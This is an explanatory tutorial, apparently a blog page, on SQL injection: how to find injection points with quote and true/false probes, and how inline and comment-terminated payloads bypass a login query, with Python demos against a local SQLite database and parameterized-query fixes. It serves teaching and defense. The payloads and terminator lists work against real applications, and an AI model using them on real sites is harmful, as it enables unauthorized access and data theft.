Introduction: causes of SQL injection vulnerabilities
SQL injection arises when programmers write code that performs database operations without checking the legitimacy of user input. The input is spliced directly into the SQL statement, so an attacker can change what the statement does, and the application carries a security risk.
Structured Query Language (SQL)
Structured Query Language is the standard language for communicating with relational databases. The four basic statements:
Query:         SELECT fields FROM table WHERE condition
Delete record: DELETE FROM table WHERE condition
Update record: UPDATE table SET field=value WHERE condition
Add record:    INSERT INTO table (fields) VALUES (values)
SQL injection attack process
1. Determine the injection point
2. Determine the injection point type
3. Determine the database type
4. Obtain the database data and escalate privileges
1. Determine the SQL injection point
Finding the injection point is the most critical and basic step.
The essential principle: find a point where the input is processed by the back end and submitted to the database. Any input that reaches the database can trigger SQL injection. There are generally three categories:
GET parameters trigger SQL injection
POST parameters trigger SQL injection
Cookies trigger SQL injection
For example: the parameters of an ordinary link (link?parameter), such as a link of the form ?id=num, or a search box.
There are many ways to verify whether an injection point exists. The most conventional and simplest method is to introduce a single quote and compare the responses:
http://host/test.php?id=100'
returns an error, indicating the possibility of injection
http://host/test.php?id=100 and 1=1
returns normally
http://host/test.php?id=100 and 1=2
returns an error (or a page different from the normal one, for example an empty result)
If all three conditions are met, the parameter is very likely an injection point.
After finding the injection point, the next step is to determine its type.
2. Determine the injection type
0x01 Numeric injection point
Testing method:
http://host/test.php?id=100 and 1=1
returns success
http://host/test.php?id=100 and 1=2
returns failure
Why does the first one return success and the second one fail? The reason is as follows. Suppose the website's SQL query statement is
SELECT * FROM news WHERE id=$id
where $id is the value submitted by the user. When we enter
100 and 1=1
the statement becomes
SELECT * FROM news WHERE id=100 and 1=1
The left side of the and, id=100, is true because we appended our injection after an id that exists (if this id did not exist, the test would not work). The right side, 1=1, is always true, so the entire statement returns success. If we change it to
1=2
the right side is false, and the logic of and is that the whole condition fails as soon as one side fails, so the statement with 1=2 finally returns failure.
0x02 Character injection point
Test method:
http://host/test.php?name=man' and '1'='1
returns success
http://host/test.php?name=man' and '1'='2
returns failure
This turns the numeric type above into a character type. The reason is as follows. Suppose the website's SQL statement is
SELECT * FROM news WHERE name='$name'
When we construct the input
man' and '1'='1
the statement becomes
SELECT * FROM news WHERE name='man' and '1'='1'
Notice what happened: the quotes have been closed again, so the statement is still well-formed. It is the same as before: the left side of the and must be true, and the right side is also true, so after the and logic the entire statement returns success. Similarly, if the input ends with
1'='2
it will return failure. Of course, it does not have to be 1 or 2; because this is a character type we can enter any characters, like this:
http://host/test.php?name=man' and 'a'='a
returns success
http://host/test.php?name=man' and 'a'='b
returns failure
0x03 Search injection point (currently common)
Testing method:
http://host/test.php?keyword=python%' and 1=1 and '%'='
http://host/test.php?keyword=python%' and 1=2 and '%'='
Suppose our SQL query statement is
SELECT * FROM news WHERE keyword like '%$keyword%'
where $keyword is the user input. When we enter
python%' and 1=1 and '%'='
we end up with the statement
SELECT * FROM news WHERE keyword like '%python%' and 1=1 and '%'='%'
which is closed again. Because this is and logic, a failure in any part makes the whole statement fail. We can divide the statement into three parts:
SELECT * FROM news WHERE keyword like '%python%'
and 1=1
and '%'='%'
The first part is definitely successful (again, we build the injection on top of an existing query). The second and third parts are also true, because a value always equals itself. But if we replace the second part with
1=2
that part will definitely fail, and so will the whole statement. That is the principle.
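The probe from step 1 and the three injection types above, as an added example that is not part of the original page: a Python script that builds the same three vulnerable queries against an in-memory SQLite database and runs the single-quote / and 1=1 / and 1=2 probe against each one, with a parameterized query at the end for comparison. The news table, its rows (ids 100 and 101, name man, keyword python) and the probe function are constructed for this demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the original page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, name TEXT, keyword TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)",
                     [(100, "man", "python"), (101, "woman", "java")])
    return conn

# The three vulnerable patterns from the text. Each splices the raw parameter
# straight into the statement, which is exactly the mistake that makes
# injection possible.
def numeric_query(value):
    return f"SELECT * FROM news WHERE id={value}"

def character_query(value):
    return f"SELECT * FROM news WHERE name='{value}'"

def search_query(value):
    return f"SELECT * FROM news WHERE keyword LIKE '%{value}%'"

def run(conn, sql):
    """Execute concatenated SQL; report ('rows', count) or ('error', message)."""
    try:
        return ("rows", len(conn.execute(sql).fetchall()))
    except sqlite3.Error as exc:
        return ("error", str(exc))

def probe(conn, build, base, true_payload, false_payload):
    """The single-quote / true-condition / false-condition probe from the text.

    Returns True when the responses fit the injection-point pattern: a stray
    quote breaks the statement, the always-true condition behaves like the
    untouched request, and the always-false condition returns nothing.
    """
    quote = run(conn, build(base + "'"))
    normal = run(conn, build(base))
    always_true = run(conn, build(base + true_payload))
    always_false = run(conn, build(base + false_payload))
    return (quote[0] == "error"
            and normal[0] == "rows" and normal[1] > 0
            and always_true == normal
            and always_false == ("rows", 0))

# Probe pairs for each injection type, as written in the sections above.
PROBES = {
    "numeric":   (numeric_query,   "100",    " and 1=1",             " and 1=2"),
    "character": (character_query, "man",    "' and '1'='1",         "' and '1'='2"),
    "search":    (search_query,    "python", "%' and 1=1 and '%'='", "%' and 1=2 and '%'='"),
}

def classify(conn):
    """Run every probe pair and return {injection type: looks injectable?}."""
    return {kind: probe(conn, *args) for kind, args in PROBES.items()}

def safe_numeric(conn, value):
    """Hardened form: the value is bound as a parameter, never spliced into the
    SQL, so '100 and 1=1' is compared as data and matches no row."""
    return conn.execute("SELECT * FROM news WHERE id=?", (value,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for kind, injectable in classify(db).items():
        print(f"{kind:10s} injection point: {injectable}")
    print("bound '100 and 1=1' rows:", len(safe_numeric(db, "100 and 1=1")))
```

Against a live target the same three requests are sent over HTTP and the comparison is made on status codes, page length or content rather than on row counts, but the decision logic is the one in probe(): the quote must break the query, the always-true condition must look like the original page, and the always-false condition must differ.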
0x04 Inline SQL injection (commonly used)
Inline injection means that after the attacker's SQL code is injected, the original query is still executed in full.
Suppose our website's SQL query statement is
SELECT * FROM admin WHERE username='$name' AND password='$passwd'
This looks like the code for a login page. We can construct the following statement and submit it in the login form's username box
' or ''='
or in the password box. The two submission methods give different results, so let us analyze both. Submitted as the username, the statement becomes
SELECT * FROM admin WHERE username='' or ''='' AND password='fuzz'
where fuzz is whatever string we typed into the password box. Submitted as the password, it becomes
SELECT * FROM admin WHERE username='fuzz' AND password='' or ''=''
Note: in SQL, AND has higher priority than OR. AND is evaluated first and OR afterwards, so the OR divides our statement into two parts.
In the username box:
SELECT * FROM admin WHERE username=''
or
''='' AND password='fuzz'
In the password box:
SELECT * FROM admin WHERE username='fuzz' AND password=''
or
''=''
Take the username case first, with AND evaluated before OR:
SELECT * FROM admin WHERE username=''
returns failure
or
''='' AND password='fuzz'
returns failure
No row in the table has an empty username, so the first part fails. In the second part, since we typed the password at random, with near certainty (99.99%) it does not exist, so the AND condition also fails, and the whole statement returns failure.
The password case is different:
SELECT * FROM admin WHERE username='fuzz' AND password=''
or
''=''
Here the first part returns failure, but the second part, ''='', returns success. The logic of OR is to succeed if either side succeeds, so the entire statement returns success. Once the query succeeds we bypass the login form and log straight into the system.
0x05 Terminating SQL injection (commonly used)
Terminating SQL statement injection means that when the attacker injects SQL code, he ends the statement by commenting out the rest of the query, so the commented-out part is never executed. Take the example above.
We already know that filling the username box with
' or ''='
does not return success. Does that mean there is nothing we can do with the username box? Wrong, we still have the terminator. Take the same SQL query
SELECT * FROM admin WHERE username='$name' AND password='$passwd'
and construct the following username input
' or ''='' --
which gives the following query
SELECT * FROM admin WHERE username='' or ''='' --' AND password='fuzz'
Here fuzz is whatever we typed in the password box, and -- is a comment. The statement now divides into three parts:
SELECT * FROM admin WHERE username=''
or ''='' returns success
--' AND password='fuzz'
The first part must return failure, but the second part returns success, and the third part has been commented out by us and is not executed, so the trick bypasses the login through the username box as well.
Some common termination methods follow.
Termination strings:
-- , #, %23, %00, /*
Termination methods:
-- , '-- , ')-- , ) -- , ')) --, ))--
Which terminator works depends on the database behind the page: -- is the standard SQL line comment (MySQL only treats it as a comment when whitespace follows the second dash, so a trailing space is needed), # is a MySQL-only line comment and %23 is its URL-encoded form, /* opens a block comment, and %00 is a null byte that cuts the string off in some application layers rather than being an SQL comment.
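The login bypass from 0x04 and 0x05, as an added example that is not part of the original page: a Python script that builds the vulnerable login query by string concatenation against an in-memory SQLite database, runs the inline payload in the username box, the inline payload in the password box and the terminating payload in the username box, and compares each with a parameterized query. The admin table and its single constructed account (admin / s3cret) are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample account for the demonstration (not from the original page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 's3cret')")
    return conn

def build_login_sql(name, passwd):
    """The vulnerable login query from the text, built by string concatenation."""
    return f"SELECT * FROM admin WHERE username='{name}' AND password='{passwd}'"

def vulnerable_login(conn, name, passwd):
    """True when the concatenated query matches at least one row.
    A syntax error is treated as a failed login, as most applications would."""
    try:
        return len(conn.execute(build_login_sql(name, passwd)).fetchall()) > 0
    except sqlite3.Error:
        return False

def safe_login(conn, name, passwd):
    """Hardened form: both values are bound as parameters, so quotes and
    comment markers in the input stay plain data and can neither close the
    string literal nor terminate the statement."""
    sql = "SELECT * FROM admin WHERE username=? AND password=?"
    return len(conn.execute(sql, (name, passwd)).fetchall()) > 0

# The payloads discussed in 0x04 and 0x05.
INLINE = "' or ''='"          # closes the quote, adds OR, re-opens a quote
TERMINATE = "' or ''='' --"   # same, then comments out the rest of the query

if __name__ == "__main__":
    db = make_db()
    cases = [
        ("inline in username", INLINE, "fuzz"),
        ("inline in password", "fuzz", INLINE),
        ("terminate in username", TERMINATE, "fuzz"),
    ]
    for label, name, passwd in cases:
        print(f"{label:22s} -> {build_login_sql(name, passwd)}")
        print(f"{'':22s}    vulnerable={vulnerable_login(db, name, passwd)}"
              f" safe={safe_login(db, name, passwd)}")
```

Running it shows the three outcomes the text predicts: the inline payload fails in the username box because AND binds tighter than OR, succeeds in the password box, and the terminating payload succeeds in the username box because everything after -- is a comment. SQLite accepts -- followed directly by the closing quote; on MySQL the same payload needs a space after the dashes (for example `' or ''='' -- ` with a trailing space, sent as %20 or + in a URL), otherwise the dashes are not a comment and the query errors out.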